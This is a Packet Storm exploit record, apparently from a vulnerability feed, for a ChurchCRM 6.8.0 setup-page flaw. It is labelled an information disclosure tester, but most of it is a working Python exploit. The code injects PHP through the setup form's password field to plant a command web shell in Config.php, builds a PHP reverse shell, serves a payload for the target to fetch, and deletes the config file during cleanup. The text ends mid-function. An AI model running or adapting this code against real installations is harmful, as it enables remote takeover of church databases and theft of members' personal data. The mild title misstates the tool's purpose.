{“lastseen”:”2026-02-18T17:38:11″,”description”:”ChurchCRM versions 6.8.0 and earlier expose the installation setup endpoint without proper access restrictions. If the setup process remains accessible after deployment, it may allow unauthorized users to interact with configuration parameters. This…”,”published”:”2026-02-18T00:00:00″,”modified”:”2026-02-18T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 ChurchCRM 6.8.0 Information Disclosure Tester”,”source”:””,”references”:””,”id”:”PACKETSTORM:215793″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================\\n | # Title : ChurchCRM \u2264 6.8.0 \u2013 Setup Page Security Misconfiguration |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.3 (64 bits) |\\n | # Vendor : https:\/\/github.com\/ChurchCRM\/ |\\n =============================================================================================================================================\\n \\n [+] Summary : ChurchCRM versions 6.8.0 and earlier expose the installation setup endpoint without proper access restrictions. \\n If the setup process remains accessible after deployment, it may allow unauthorized users to interact with configuration parameters. \\n \\t\\t\\t\\t This misconfiguration increases the risk of exploitation in unpatched or improperly secured installations. \\n Administrators are advised to disable or restrict access to the setup directory after installation and update to the latest secure version.\\n [+] POC : \\n \\n #!\/usr\/bin\/env python3\\n \\n import argparse\\n import base64\\n import random\\n import string\\n import sys\\n import time\\n import logging\\n import re\\n import socket\\n import threading\\n import http.server\\n import socketserver\\n from urllib.parse import urljoin, urlparse, quote\\n from typing import Optional, Dict, Any, Tuple, List, Union\\n from dataclasses import dataclass, field\\n from enum import Enum\\n from functools import wraps\\n import json\\n import requests\\n from requests.exceptions import RequestException\\n from requests.adapters import HTTPAdapter\\n from urllib3.util.retry import Retry\\n \\n VERSION = \\”2.0.0\\”\\n USER_AGENT = \\”Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36\\”\\n TIMEOUT = 30\\n MAX_RETRIES = 3\\n DEFAULT_PATHS = [”, ‘\/churchcrm’, ‘\/crm’, ‘\/church’, ‘\/crmchurch’]\\n \\n class ExploitError(Exception):\\n \\”\\”\\”Base exception for exploit errors\\”\\”\\”\\n pass\\n \\n \\n class TargetUnreachableError(ExploitError):\\n \\”\\”\\”Target is not reachable\\”\\”\\”\\n pass\\n \\n \\n class InjectionFailedError(ExploitError):\\n \\”\\”\\”Failed to inject payload\\”\\”\\”\\n pass\\n \\n \\n class PayloadServerError(ExploitError):\\n \\”\\”\\”Payload server error\\”\\”\\”\\n pass\\n \\n \\n class VersionDetectionError(ExploitError):\\n \\”\\”\\”Version detection error\\”\\”\\”\\n pass\\n class TargetType(Enum):\\n \\”\\”\\”Target platform types\\”\\”\\”\\n LINUX_CMD_STAGER = \\”linux_cmd_stager\\”\\n PHP_MEMORY = \\”php_memory\\”\\n PHP_FETCH = \\”php_fetch\\”\\n \\n \\n class CheckCode(Enum):\\n \\”\\”\\”Check result codes\\”\\”\\”\\n SAFE = \\”safe\\”\\n VULNERABLE = \\”vulnerable\\”\\n UNKNOWN = \\”unknown\\”\\n UNREACHABLE = \\”unreachable\\”\\n \\n \\n @dataclass\\n class TargetInfo:\\n \\”\\”\\”Target information\\”\\”\\”\\n url: str\\n base_path: str\\n scheme: str\\n host: str\\n port: int\\n version: Optional[str] = None\\n vulnerable: Optional[bool] = None\\n detected_paths: List[str] = field(default_factory=list)\\n \\n \\n @dataclass\\n class ExploitResult:\\n \\”\\”\\”Exploit result\\”\\”\\”\\n success: bool\\n session: Optional[requests.Session] = None\\n message: str = \\”\\”\\n target: Optional[TargetInfo] = None\\n output: Optional[str] = None\\n \\n class Version:\\n \\”\\”\\”Advanced version handling\\”\\”\\”\\n \\n def __init__(self, version_string: str):\\n self.original = version_string\\n self.clean = self._clean_version(version_string)\\n self.parts = self._parse_parts(self.clean)\\n self.suffix = self._extract_suffix(version_string)\\n \\n def _clean_version(self, version: str) -\\u003e str:\\n \\”\\”\\”Clean version string\\”\\”\\”\\n \\n match = re.search(r'(\\\\d+\\\\.\\\\d+(?:\\\\.\\\\d+)?)’, version)\\n return match.group(1) if match else ‘0.0.0’\\n \\n def _parse_parts(self, version: str) -\\u003e List[int]:\\n \\”\\”\\”Parse version into integer parts\\”\\”\\”\\n parts = []\\n for part in version.split(‘.’):\\n try:\\n parts.append(int(part))\\n except ValueError:\\n parts.append(0)\\n return parts\\n \\n def _extract_suffix(self, version: str) -\\u003e str:\\n \\”\\”\\”Extract suffix (e.g., -beta2, -RC1)\\”\\”\\”\\n match = re.search(r'[-_]([a-zA-Z]+\\\\d*)$’, version)\\n return match.group(1) if match else ”\\n \\n def __lt__(self, other: Union[str, ‘Version’]) -\\u003e bool:\\n \\”\\”\\”Less than comparison\\”\\”\\”\\n if isinstance(other, str):\\n other = Version(other)\\n for i in range(max(len(self.parts), len(other.parts))):\\n v1 = self.parts[i] if i \\u003c len(self.parts) else 0\\n v2 = other.parts[i] if i \\u003c len(other.parts) else 0\\n \\n if v1 \\u003c v2:\\n return True\\n if v1 \\u003e v2:\\n return False\\n \\n if self.suffix and not other.suffix:\\n return True # Has suffix is considered older\\n if not self.suffix and other.suffix:\\n return False\\n \\n return False\\n \\n def __le__(self, other: Union[str, ‘Version’]) -\\u003e bool:\\n \\”\\”\\”Less than or equal\\”\\”\\”\\n return self \\u003c other or self == other\\n \\n def __eq__(self, other: Union[str, ‘Version’]) -\\u003e bool:\\n \\”\\”\\”Equal comparison\\”\\”\\”\\n if isinstance(other, str):\\n other = Version(other)\\n return self.parts == other.parts and self.suffix == other.suffix\\n \\n def __str__(self) -\\u003e str:\\n return self.original\\n \\n def __repr__(self) -\\u003e str:\\n return f\\”Version(‘{self.original}’)\\”\\n \\n def safe_urljoin(base: str, path: str) -\\u003e str:\\n \\”\\”\\”\\n Safely join URL parts handling base paths correctly\\n \\n Examples:\\n \\u003e\\u003e\\u003e safe_urljoin(‘http:\/\/example.com\/churchcrm’, ‘\/setup\/’)\\n ‘http:\/\/example.com\/churchcrm\/setup\/’\\n \\u003e\\u003e\\u003e safe_urljoin(‘http:\/\/example.com\/churchcrm\/’, ‘setup\/’)\\n ‘http:\/\/example.com\/churchcrm\/setup\/’\\n \\”\\”\\”\\n base = base.rstrip(‘\/’)\\n \\n if path.startswith(‘\/’):\\n parsed = urlparse(base)\\n base_without_path = f\\”{parsed.scheme}:\/\/{parsed.netloc}\\”\\n base_path = parsed.path.rstrip(‘\/’)\\n return f\\”{base_without_path}{base_path}{path}\\”\\n else:\\n return f\\”{base}\/{path.lstrip(‘\/’)}\\”\\n \\n \\n def normalize_url(url: str) -\\u003e str:\\n \\”\\”\\”Normalize URL by adding scheme if missing and removing trailing slash\\”\\”\\”\\n if not url.startswith((‘http:\/\/’, ‘https:\/\/’)):\\n url = ‘http:\/\/’ + url\\n return url.rstrip(‘\/’)\\n \\n \\n def parse_target(url: str) -\\u003e TargetInfo:\\n \\”\\”\\”Parse target URL and return TargetInfo\\”\\”\\”\\n url = normalize_url(url)\\n parsed = urlparse(url)\\n \\n return TargetInfo(\\n url=url,\\n base_path=parsed.path.rstrip(‘\/’) or ‘\/’,\\n scheme=parsed.scheme,\\n host=parsed.hostname,\\n port=parsed.port or (443 if parsed.scheme == ‘https’ else 80),\\n )\\n \\n \\n def discover_base_path(session: requests.Session, base_url: str, \\n paths: List[str] = None, logger: logging.Logger = None) -\\u003e Optional[str]:\\n \\”\\”\\”\\n Discover the correct base path by trying common paths\\n \\”\\”\\”\\n if paths is None:\\n paths = DEFAULT_PATHS\\n \\n parsed = urlparse(base_url)\\n base = f\\”{parsed.scheme}:\/\/{parsed.netloc}\\”\\n \\n for path in paths:\\n test_url = f\\”{base}{path}\\” if path else base\\n try:\\n setup_url = safe_urljoin(test_url, ‘\/setup\/’)\\n if logger:\\n logger.debug(f\\”Trying path: {setup_url}\\”)\\n \\n response = session.get(setup_url, timeout=5, allow_redirects=False)\\n \\n if response.status_code in [200, 301, 302]:\\n if logger:\\n logger.info(f\\”Found ChurchCRM at: {test_url}\\”)\\n return test_url\\n except:\\n continue\\n \\n return None\\n \\n class ColoredFormatter(logging.Formatter):\\n \\”\\”\\”Custom formatter with colors\\”\\”\\”\\n \\n COLORS = {\\n ‘DEBUG’: ‘\\\\033[36m’, \\n ‘INFO’: ‘\\\\033[32m’, \\n ‘WARNING’: ‘\\\\033[33m’, \\n ‘ERROR’: ‘\\\\033[31m’, \\n ‘CRITICAL’: ‘\\\\033[35m’, \\n ‘RESET’: ‘\\\\033[0m’ \\n }\\n \\n def format(self, record):\\n levelname = record.levelname\\n if levelname in self.COLORS:\\n record.levelname = f\\”{self.COLORS[levelname]}{levelname}{self.COLORS[‘RESET’]}\\”\\n return super().format(record)\\n \\n \\n def setup_logger(debug: bool = False) -\\u003e logging.Logger:\\n \\”\\”\\”Setup logger with appropriate configuration\\”\\”\\”\\n logger = logging.getLogger(‘churchcrm_exploit’)\\n logger.setLevel(logging.DEBUG if debug else logging.INFO)\\n \\n if not logger.handlers:\\n handler = logging.StreamHandler(sys.stdout)\\n formatter = ColoredFormatter(\\n ‘%(asctime)s [%(levelname)s] %(message)s’,\\n datefmt=’%H:%M:%S’\\n )\\n handler.setFormatter(formatter)\\n logger.addHandler(handler)\\n \\n return logger\\n \\n def create_session(retries: int = MAX_RETRIES) -\\u003e requests.Session:\\n \\”\\”\\”Create requests session with retry logic\\”\\”\\”\\n session = requests.Session()\\n \\n retry_strategy = Retry(\\n total=retries,\\n backoff_factor=0.5,\\n status_forcelist=[500, 502, 503, 504],\\n allowed_methods=[\\”HEAD\\”, \\”GET\\”, \\”OPTIONS\\”, \\”POST\\”]\\n )\\n \\n adapter = HTTPAdapter(max_retries=retry_strategy)\\n session.mount(\\”http:\/\/\\”, adapter)\\n session.mount(\\”https:\/\/\\”, adapter)\\n \\n session.headers.update({\\n ‘User-Agent’: USER_AGENT,\\n ‘Accept’: ‘text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8’,\\n ‘Accept-Language’: ‘en-US,en;q=0.5’,\\n ‘Accept-Encoding’: ‘gzip, deflate’,\\n ‘Connection’: ‘keep-alive’,\\n })\\n \\n return session\\n \\n def random_string(length: int = 8) -\\u003e str:\\n \\”\\”\\”Generate random string\\”\\”\\”\\n return ”.join(random.choices(string.ascii_lowercase, k=length))\\n \\n \\n def random_int_string(min_len: int = 5, max_len: int = 10) -\\u003e str:\\n \\”\\”\\”Generate random integer as string\\”\\”\\”\\n length = random.randint(min_len, max_len)\\n return ”.join(random.choices(string.digits, k=length))\\n \\n \\n def random_url() -\\u003e str:\\n \\”\\”\\”Generate random URL\\”\\”\\”\\n return f\\”http:\/\/{random_string(8)}.com\/\\”\\n \\n class PayloadHandler(http.server.SimpleHTTPRequestHandler):\\n \\”\\”\\”HTTP handler for serving payloads\\”\\”\\”\\n \\n payload = None\\n logger = None\\n request_count = 0\\n \\n def do_GET(self):\\n \\”\\”\\”Handle GET request\\”\\”\\”\\n PayloadHandler.request_count += 1\\n \\n if self.logger:\\n self.logger.debug(f\\”Payload request #{PayloadHandler.request_count} from {self.client_address[0]}\\”)\\n \\n if self.payload:\\n self.send_response(200)\\n self.send_header(‘Content-Type’, ‘application\/x-httpd-php’)\\n self.send_header(‘Content-Length’, str(len(self.payload)))\\n self.send_header(‘Pragma’, ‘no-cache’)\\n self.send_header(‘Cache-Control’, ‘no-cache, no-store, must-revalidate’)\\n self.end_headers()\\n self.wfile.write(self.payload.encode())\\n \\n if self.logger:\\n self.logger.info(f\\”Served payload to {self.client_address[0]}\\”)\\n else:\\n self.send_response(404)\\n self.end_headers()\\n \\n def log_message(self, format, *args):\\n \\”\\”\\”Override to use our logger\\”\\”\\”\\n if self.logger and self.logger.isEnabledFor(logging.DEBUG):\\n self.logger.debug(f\\”Payload server: {format % args}\\”)\\n \\n \\n class PayloadServer:\\n \\”\\”\\”HTTP server for serving payloads\\”\\”\\”\\n \\n def __init__(self, logger: logging.Logger, host: str = ‘0.0.0.0’, port: int = 0):\\n self.logger = logger\\n self.host = host\\n self.port = port\\n self.server = None\\n self.thread = None\\n self.payload = None\\n \\n def start(self, payload: str) -\\u003e str:\\n \\”\\”\\”Start payload server and return URL\\”\\”\\”\\n self.payload = payload\\n PayloadHandler.payload = payload\\n PayloadHandler.logger = self.logger\\n PayloadHandler.request_count = 0\\n self.server = socketserver.TCPServer((self.host, self.port), PayloadHandler, bind_and_activate=False)\\n self.server.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\\n self.server.server_bind()\\n self.server.server_activate()\\n self.port = self.server.server_address[1]\\n self.thread = threading.Thread(target=self.server.serve_forever)\\n self.thread.daemon = True\\n self.thread.start()\\n \\n server_url = f\\”http:\/\/{self.get_local_ip()}:{self.port}\/\\”\\n self.logger.info(f\\”Payload server started at {server_url}\\”)\\n \\n return server_url\\n \\n def stop(self):\\n \\”\\”\\”Stop payload server\\”\\”\\”\\n if self.server:\\n self.server.shutdown()\\n self.server.server_close()\\n self.logger.debug(f\\”Payload server stopped (served {PayloadHandler.request_count} requests)\\”)\\n \\n def get_local_ip(self) -\\u003e str:\\n \\”\\”\\”Get local IP address\\”\\”\\”\\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\\n try:\\n s.connect((‘10.255.255.255’, 1))\\n ip = s.getsockname()[0]\\n except Exception:\\n ip = ‘127.0.0.1’\\n finally:\\n s.close()\\n return ip\\n \\n def wait_for_requests(self, timeout: int = 10) -\\u003e bool:\\n \\”\\”\\”Wait for at least one request\\”\\”\\”\\n start = time.time()\\n while time.time() – start \\u003c timeout:\\n if PayloadHandler.request_count \\u003e 0:\\n return True\\n time.sleep(0.5)\\n return False\\n \\n class VersionDetector:\\n \\”\\”\\”Detect ChurchCRM version from response\\”\\”\\”\\n \\n def __init__(self, logger: logging.Logger):\\n self.logger = logger\\n self.patterns = [\\n (re.compile(r’CRM-VERSION:\\\\s*([0-9]+\\\\.[0-9]+(?:\\\\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)’, re.I), ‘header’),\\n (re.compile(r’\\u003cmeta[^\\u003e]*name=[\\”\\\\’]version[\\”\\\\’][^\\u003e]*content=[\\”\\\\’]([0-9]+\\\\.[0-9]+(?:\\\\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)’, re.I), ‘meta’),\\n (re.compile(r’\\u003cmeta[^\\u003e]*content=[\\”\\\\’]([0-9]+\\\\.[0-9]+(?:\\\\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)[^\\u003e]*name=[\\”\\\\’]version’, re.I), ‘meta’),\\n (re.compile(r’\\u003c!–\\\\s*ChurchCRM[^\\\\d]*([0-9]+\\\\.[0-9]+(?:\\\\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)’, re.I), ‘comment’),\\n (re.compile(r’ChurchCRM[^\\\\d]*([0-9]+\\\\.[0-9]+(?:\\\\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)’, re.I), ‘footer’),\\n (re.compile(r’window\\\\.ChurchCRM\\\\s*=\\\\s*\\\\{[^}]*version:\\\\s*[\\”\\\\’]([0-9]+\\\\.[0-9]+(?:\\\\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)’, re.I), ‘js’),\\n (re.compile(r’\\”softwareVersion\\”\\\\s*:\\\\s*\\”([0-9]+\\\\.[0-9]+(?:\\\\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)’, re.I), ‘json’),\\n (re.compile(r’ChurchCRM[\\\\\/\\\\s-]*([0-9]+\\\\.[0-9]+(?:\\\\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)’, re.I), ‘php’),\\n ]\\n \\n def detect(self, response: requests.Response) -\\u003e Optional[Version]:\\n \\”\\”\\”Detect version from response\\”\\”\\”\\n detected_versions = []\\n \\n if ‘CRM-VERSION’ in response.headers:\\n version = self._clean_version(response.headers[‘CRM-VERSION’])\\n if version:\\n self.logger.debug(f\\”Version found in header: {version}\\”)\\n detected_versions.append((‘header’, version))\\n \\n if ‘X-Powered-By’ in response.headers:\\n match = re.search(r’ChurchCRM[\\\\\/\\\\s-]*([0-9]+\\\\.[0-9]+(?:\\\\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)’, \\n response.headers[‘X-Powered-By’], re.I)\\n if match:\\n version = self._clean_version(match.group(1))\\n if version:\\n self.logger.debug(f\\”Version found in X-Powered-By: {version}\\”)\\n detected_versions.append((‘x-powered’, version))\\n \\n for pattern, source in self.patterns:\\n matches = pattern.findall(response.text)\\n for match in matches:\\n if isinstance(match, tuple):\\n match = match[0]\\n version = self._clean_version(match)\\n if version:\\n self.logger.debug(f\\”Version found in {source}: {version}\\”)\\n detected_versions.append((source, version))\\n \\n if not detected_versions:\\n return None\\n \\n version_counts = {}\\n for source, version in detected_versions:\\n version_str = str(version)\\n version_counts[version_str] = version_counts.get(version_str, 0) + 1\\n \\n most_common = max(version_counts.items(), key=lambda x: x[1])\\n self.logger.debug(f\\”Most common version: {most_common[0]} (appears {most_common[1]} times)\\”)\\n \\n return Version(most_common[0])\\n \\n def _clean_version(self, version: str) -\\u003e Optional[Version]:\\n \\”\\”\\”Clean and validate version string\\”\\”\\”\\n version = version.strip()\\n \\n match = re.search(r'([0-9]+\\\\.[0-9]+(?:\\\\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)’, version)\\n if match:\\n return Version(match.group(1))\\n \\n return None\\n \\n def is_vulnerable(self, version: Optional[Version]) -\\u003e Optional[bool]:\\n \\”\\”\\”Check if version is vulnerable using enhanced comparison\\”\\”\\”\\n if not version:\\n return None\\n \\n try:\\n \\n vulnerable = version \\u003c= ‘6.8.0’\\n \\n self.logger.debug(f\\”Version {version} \\u003c= 6.8.0? {vulnerable}\\”)\\n return vulnerable\\n \\n except Exception as e:\\n self.logger.error(f\\”Version comparison error: {e}\\”)\\n return None\\n \\n class ChurchCRMExploit:\\n \\”\\”\\”ChurchCRM RCE Exploit\\”\\”\\”\\n \\n def __init__(self, target_url: str, logger: logging.Logger, \\n target_type: TargetType = TargetType.LINUX_CMD_STAGER,\\n lhost: Optional[str] = None, lport: Optional[int] = None,\\n payload: Optional[str] = None, verify_ssl: bool = True,\\n proxy: Optional[str] = None, auto_discover: bool = True):\\n \\n self.logger = logger\\n self.original_url = target_url\\n self.target_type = target_type\\n self.lhost = lhost\\n self.lport = lport\\n self.custom_payload = payload\\n self.verify_ssl = verify_ssl\\n self.proxy = proxy\\n self.auto_discover = auto_discover\\n self.session = create_session()\\n self.payload_server = None\\n self.version_detector = VersionDetector(logger)\\n self.backdoor_injected = False\\n \\n if proxy:\\n self.session.proxies = {‘http’: proxy, ‘https’: proxy}\\n \\n self.target = self._initialize_target(target_url)\\n \\n def _initialize_target(self, target_url: str) -\\u003e TargetInfo:\\n \\”\\”\\”Initialize target with optional path discovery\\”\\”\\”\\n \\n try:\\n info = parse_target(target_url)\\n \\n test_url = safe_urljoin(info.url, ‘\/setup\/’)\\n response = self.session.get(test_url, timeout=5, verify=self.verify_ssl, allow_redirects=False)\\n \\n if response.status_code in [200, 301, 302]:\\n self.logger.info(f\\”Target URL working: {info.url}\\”)\\n info.detected_paths.append(info.base_path)\\n return info\\n except:\\n pass\\n \\n if self.auto_discover:\\n self.logger.info(\\”Direct URL not working, attempting path discovery…\\”)\\n discovered = discover_base_path(self.session, target_url, logger=self.logger)\\n \\n if discovered:\\n info = parse_target(discovered)\\n info.detected_paths = DEFAULT_PATHS\\n self.logger.info(f\\”Discovered ChurchCRM at: {info.url}\\”)\\n return info\\n return parse_target(target_url)\\n \\n def check(self) -\\u003e Dict[str, Any]:\\n \\”\\”\\”Check if target is vulnerable\\”\\”\\”\\n self.logger.info(f\\”Checking target: {self.target.url}\\”)\\n \\n try:\\n \\n url = safe_urljoin(self.target.url, ‘\/setup\/’)\\n self.logger.debug(f\\”Accessing {url}\\”)\\n \\n response = self.session.get(\\n url,\\n timeout=TIMEOUT,\\n verify=self.verify_ssl,\\n allow_redirects=True\\n )\\n \\n self.logger.debug(f\\”Response code: {response.status_code}\\”)\\n \\n if response.status_code not in [200, 301, 302]:\\n self.logger.warning(f\\”Unexpected response code: {response.status_code}\\”)\\n return {\\n ‘code’: CheckCode.UNREACHABLE,\\n ‘message’: f’Setup page returned HTTP {response.status_code}’\\n }\\n \\n version = self.version_detector.detect(response)\\n \\n if version:\\n self.logger.info(f\\”Detected ChurchCRM version: {version}\\”)\\n vulnerable = self.version_detector.is_vulnerable(version)\\n self.target.version = str(version)\\n self.target.vulnerable = vulnerable\\n \\n if vulnerable:\\n self.logger.warning(\\”Target appears VULNERABLE!\\”)\\n return {\\n ‘code’: CheckCode.VULNERABLE,\\n ‘version’: str(version),\\n ‘message’: f’Vulnerable version {version} detected’\\n }\\n else:\\n self.logger.info(\\”Target appears NOT vulnerable\\”)\\n return {\\n ‘code’: CheckCode.SAFE,\\n ‘version’: str(version),\\n ‘message’: f’Version {version} is not vulnerable’\\n }\\n else:\\n self.logger.warning(\\”Could not detect version\\”)\\n return {\\n ‘code’: CheckCode.UNKNOWN,\\n ‘message’: ‘Version unknown – setup page accessible’\\n }\\n \\n except RequestException as e:\\n self.logger.error(f\\”Request failed: {e}\\”)\\n return {\\n ‘code’: CheckCode.UNREACHABLE,\\n ‘message’: f’Target unreachable: {e}’\\n }\\n \\n def build_payload(self) -\\u003e str:\\n \\”\\”\\”Build payload based on target type\\”\\”\\”\\n prefix = f\\”{random_string(3)}’;\\”\\n \\n if self.target_type == TargetType.PHP_MEMORY:\\n \\n if self.custom_payload:\\n php_payload = self.custom_payload\\n else:\\n \\n php_payload = self._generate_reverse_shell()\\n \\n b64_payload = base64.b64encode(php_payload.encode()).decode()\\n return f\\”{prefix} eval(base64_decode(\\\\\\”{b64_payload}\\\\\\”)); \/\/\\”\\n \\n elif self.target_type == TargetType.PHP_FETCH:\\n \\n if not self.payload_server:\\n raise PayloadServerError(\\”Payload server not started\\”)\\n \\n payload_name = f\\”\/tmp\/{random_string(8)}.php\\”\\n server_url = f\\”http:\/\/{self.lhost}:{self.payload_server.port}\/\\”\\n \\n return (f\\”{prefix} $f='{payload_name}’; \\”\\n f\\”file_put_contents($f, file_get_contents(‘{server_url}’)); \\”\\n f\\”register_shutdown_function(‘unlink’, $f); include($f); \/\/\\”)\\n \\n else:\\n \\n return f\\”{prefix} system($_GET[‘cmd’]); \/\/\\”\\n \\n def _generate_reverse_shell(self) -\\u003e str:\\n \\”\\”\\”Generate PHP reverse shell\\”\\”\\”\\n if not self.lhost or not self.lport:\\n return \\”phpinfo();\\”\\n \\n return f\\”\\”\\”\\u003c?php\\n \\n $lhost = ‘{self.lhost}’;\\n $lport = {self.lport};\\n \\n if (function_exists(‘fsockopen’) \\u0026\\u0026 function_exists(‘proc_open’)) {{\\n $sock = @fsockopen($lhost, $lport);\\n if ($sock) {{\\n $descriptors = array(\\n 0 =\\u003e $sock,\\n 1 =\\u003e $sock,\\n 2 =\\u003e $sock\\n );\\n $process = proc_open((PHP_OS == ‘WINNT’ ? ‘cmd’ : ‘\/bin\/sh’), $descriptors, $pipes);\\n proc_close($process);\\n }}\\n }}\\n \\n if (function_exists(‘socket_create’) \\u0026\\u0026 function_exists(‘proc_open’)) {{\\n $sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);\\n if ($sock \\u0026\\u0026 @socket_connect($sock, $lhost, $lport)) {{\\n $descriptors = array(\\n 0 =\\u003e $sock,\\n 1 =\\u003e $sock,\\n 2 =\\u003e $sock\\n );\\n $process = proc_open((PHP_OS == ‘WINNT’ ? ‘cmd’ : ‘\/bin\/sh’), $descriptors, $pipes);\\n proc_close($process);\\n }}\\n }}\\n ?\\u003e\\”\\”\\”\\n \\n def inject_backdoor(self) -\\u003e bool:\\n \\”\\”\\”Inject backdoor via setup page\\”\\”\\”\\n self.logger.info(\\”Injecting backdoor into Include\/Config.php…\\”)\\n \\n payload = self.build_payload()\\n \\n post_data = {\\n ‘DB_SERVER_NAME’: random_string(8),\\n ‘DB_SERVER_PORT’: ‘3306’,\\n ‘DB_NAME’: random_string(8),\\n ‘DB_USER’: random_string(6),\\n ‘DB_PASSWORD’: payload,\\n ‘ROOT_PATH’: ‘\/’,\\n ‘URL’: random_url()\\n }\\n \\n self.logger.debug(f\\”POST data prepared (password field contains payload)\\”)\\n \\n try:\\n url = safe_urljoin(self.target.url, ‘\/setup\/’)\\n self.logger.debug(f\\”Sending POST to {url}\\”)\\n \\n response = self.session.post(\\n url,\\n data=post_data,\\n timeout=TIMEOUT,\\n verify=self.verify_ssl,\\n allow_redirects=False\\n )\\n \\n if response.status_code == 200:\\n self.logger.info(\\”Backdoor injected successfully!\\”)\\n self.backdoor_injected = True\\n return True\\n else:\\n self.logger.error(f\\”Injection failed with HTTP {response.status_code}\\”)\\n return False\\n \\n except RequestException as e:\\n self.logger.error(f\\”Injection request failed: {e}\\”)\\n return False\\n \\n def execute_command(self, cmd: str) -\\u003e Optional[str]:\\n \\”\\”\\”Execute command on target\\”\\”\\”\\n if not self.backdoor_injected:\\n self.logger.warning(\\”Backdoor not injected yet. Attempting injection…\\”)\\n if not self.inject_backdoor():\\n self.logger.error(\\”Cannot execute command: backdoor injection failed\\”)\\n return None\\n \\n self.logger.info(f\\”Executing command: {cmd}\\”)\\n \\n try:\\n url = safe_urljoin(self.target.url, ‘\/’)\\n self.logger.debug(f\\”Command URL: {url}?cmd={quote(cmd)}\\”)\\n \\n response = self.session.get(\\n url,\\n params={‘cmd’: cmd},\\n timeout=TIMEOUT,\\n verify=self.verify_ssl\\n )\\n \\n if response.status_code == 200:\\n \\n output = response.text.strip()\\n \\n if ‘\\u003chtml’ in output.lower():\\n \\n body_match = re.search(r’\\u003cbody[^\\u003e]*\\u003e(.*?)\\u003c\/body\\u003e’, output, re.S | re.I)\\n if body_match:\\n output = body_match.group(1).strip()\\n \\n output = re.sub(r’\\u003c[^\\u003e]+\\u003e’, ‘ ‘, output)\\n output = re.sub(r’\\\\s+’, ‘ ‘, output).strip()\\n \\n return output\\n else:\\n self.logger.error(f\\”Command execution failed with HTTP {response.status_code}\\”)\\n return None\\n \\n except RequestException as e:\\n self.logger.error(f\\”Command execution request failed: {e}\\”)\\n return None\\n \\n def cleanup(self) -\\u003e bool:\\n \\”\\”\\”Clean up – remove backdoor\\”\\”\\”\\n if not self.backdoor_injected:\\n self.logger.debug(\\”No backdoor to clean up\\”)\\n return True\\n \\n self.logger.info(\\”Cleaning up…\\”)\\n \\n commands = [\\n ‘rm -f Include\/Config.php’,\\n ‘rm Include\/Config.php’,\\n ‘rm -f churchcrm\/Include\/Config.php’,\\n ‘del \/f Include\\\\\\\\Config.php’,\\n ‘php -r \\”unlink(\\\\’Include\/Config.php\\\\’);\\”‘,\\n ‘php -r \\”unlink(\\\\’churchcrm\/Include\/Config.php\\\\’);\\”‘\\n ]\\n \\n success = False\\n for cmd in commands:\\n result = self.execute_command(cmd)\\n if result is not None: # Command executed (even if file doesn’t exist)\\n self.logger.debug(f\\”Cleanup command executed: {cmd}\\”)\\n success = True\\n \\n if success:\\n self.logger.info(\\”Cleanup completed\\”)\\n self.backdoor_injected = False\\n else:\\n self.logger.warning(\\”Cleanup may have failed\\”)\\n \\n return success\\n \\n def run_cmd_stager(self, cmd: str) -\\u003e Tuple[bool, Optional[str]]:\\n \\”\\”\\”Run command stager\\”\\”\\”\\n output = self.execute_command(cmd)\\n return (output is not None, output)\\n \\n def run_php_memory(self) -\\u003e Tuple[bool, Optional[str]]:\\n \\”\\”\\”Run PHP in-memory payload\\”\\”\\”\\n self.logger.info(\\”Executing PHP in-memory payload…\\”)\\n \\n try:\\n url = safe_urljoin(self.target.url, ‘\/’)\\n self.logger.debug(f\\”Triggering payload via GET to {url}\\”)\\n \\n response = self.session.get(url, timeout=TIMEOUT, verify=self.verify_ssl)\\n \\n if response.status_code == 200:\\n self.logger.info(\\”PHP payload executed successfully\\”)\\n \\n return (True, response.text[:500] + \\”…\\” if len(response.text) \\u003e 500 else response.text)\\n else:\\n self.logger.error(f\\”PHP execution failed with HTTP {response.status_code}\\”)\\n return (False, None)\\n \\n except RequestException as e:\\n self.logger.error(f\\”PHP execution request failed: {e}\\”)\\n return (False, None)\\n \\n def run_php_fetch(self) -\\u003e Tuple[bool, Optional[str]]:\\n \\”\\”\\”Run PHP fetch payload\\”\\”\\”\\n self.logger.info(\\”Executing PHP fetch payload…\\”)\\n \\n self.payload_server = PayloadServer(self.logger, host=’0.0.0.0′)\\n \\n if self.custom_payload:\\n payload = self.custom_payload\\n else:\\n payload = self._generate_reverse_shell()\\n \\n try:\\n server_url = self.payload_server.start(payload)\\n self.logger.info(f\\”Serving payload from {server_url}\\”)\\n \\n time.sleep(2)\\n \\n if self.inject_backdoor():\\n self.logger.info(\\”Waiting for payload request…\\”)\\n \\n if self.payload_server.wait_for_requests(timeout=30):\\n self.logger.info(\\”Payload was fetched by target\\”)\\n \\n time.sleep(5)\\n success = True\\n else:\\n self.logger.warning(\\”No payload request received\\”)\\n success = False\\n else:\\n success = False\\n \\n return (success, None)\\n \\n finally:\\n self.payload_server.stop()\\n \\n def exploit(self) -\\u003e ExploitResult:\\n \\”\\”\\”Main exploit method\\”\\”\\”\\n self.logger.info(f\\”Starting exploit against {self.target.url}\\”)\\n self.logger.info(f\\”Target type: {self.target_type.value}\\”)\\n \\n check_result = self.check()\\n \\n if check_result[‘code’] == CheckCode.UNREACHABLE:\\n return ExploitResult(\\n success=False,\\n message=f\\”Target unreachable: {check_result[‘message’]}\\”\\n )\\n \\n if check_result[‘code’] == CheckCode.SAFE:\\n return ExploitResult(\\n success=False,\\n message=check_result[‘message’]\\n )\\n \\n if not self.inject_backdoor():\\n return 